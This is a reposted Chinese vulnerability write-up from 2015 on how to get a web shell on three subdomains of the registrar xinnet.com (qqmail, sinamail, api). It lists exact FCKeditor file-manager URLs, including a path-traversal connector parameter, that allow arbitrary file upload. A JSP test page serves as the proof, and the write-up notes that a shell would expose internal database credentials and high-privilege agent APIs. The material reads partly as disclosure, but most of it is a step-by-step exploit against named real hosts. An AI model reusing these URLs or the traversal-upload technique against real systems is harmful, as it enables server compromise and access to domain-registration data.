鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

新网数码三个重要分站可拿shell

来源:互联网 作者:佚名 时间:2015-10-19 08:43
新网数码三个重要分站可拿shell,涉及域名管理、注册的重要接口。 漏洞很低级,对安全重视一些即可避免。 FCKeditor任意文件上传 新网主站出现过FCKeditor的漏洞、代理商的网站系统也出现过FCKeditor漏洞,可见新网的很多web系统是用FCKeditor编辑器的 那么其
新网数码三个重要分站可拿shell,涉及域名管理、注册的重要接口。

漏洞很低级,对安全重视一些即可避免。
 
FCKeditor任意文件上传
 
新网主站出现过FCKeditor的漏洞、代理商的网站系统也出现过FCKeditor漏洞,可见新网的很多web系统是用FCKeditor编辑器的
 
那么其他分站是不是也存在这种漏洞呢?
 
这里我们看下http://qqmail.xinnet.com
 
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
 
很不幸 返回状态是404
 
那么是不是qqmail.xinnet.com就不是使用FCKeditor呢?
 
我们继续看 于是发现了:
 
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
 
返回HTTP Status 500 很明显 文件是存在的
 
新网应该是对FCKeditor的问题做过考虑的
 
那这样我们是不是就无法利用了呢?
 
不是的 我们可以本地构建个表单向http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector提交
 
但事实上不用这么麻烦
 
后来我又发现了这个
 
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
 
当然 这个url是不对的
 
 
 
因为connectors/jsp/connector这个路径是错误的
 
正确的url:
 
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
 
到这里我们就可以上传任意文件了
 
传个helloworld吧
 
 
<HTML>
<HEAD>
<TITLE>HelloWorld!</TITLE>
</HEAD>
<BODY>
<%
out.println("<h1>Hello World!<br>世界,你好!</h1>");
%>
</BODY>
</HTML>

 

 
其他的还有:
 
http://sinamail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
 
 
 
http://api.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector 
 
 
上传shell之后 可以做很多的 里面有新网一些数据库连接信息(虽然是内网地址,但我们还是可以连接的) 新网代理商的api权限还是很大的 
 
网友评论
<